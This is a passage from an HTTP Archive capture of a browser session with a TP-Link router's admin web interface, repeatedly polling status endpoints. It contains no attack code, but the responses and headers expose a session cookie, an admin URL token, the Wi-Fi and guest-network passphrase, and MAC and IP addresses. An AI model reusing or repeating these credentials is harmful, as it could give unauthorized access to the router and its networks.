\"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:59.655+03:00\",\r\n \"time\": 1789,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 517,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.646+03:00\",\r\n \"time\": 932,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 637,\r\n \"receive\": 29\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:09.653+03:00\",\r\n \"time\": 1840,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 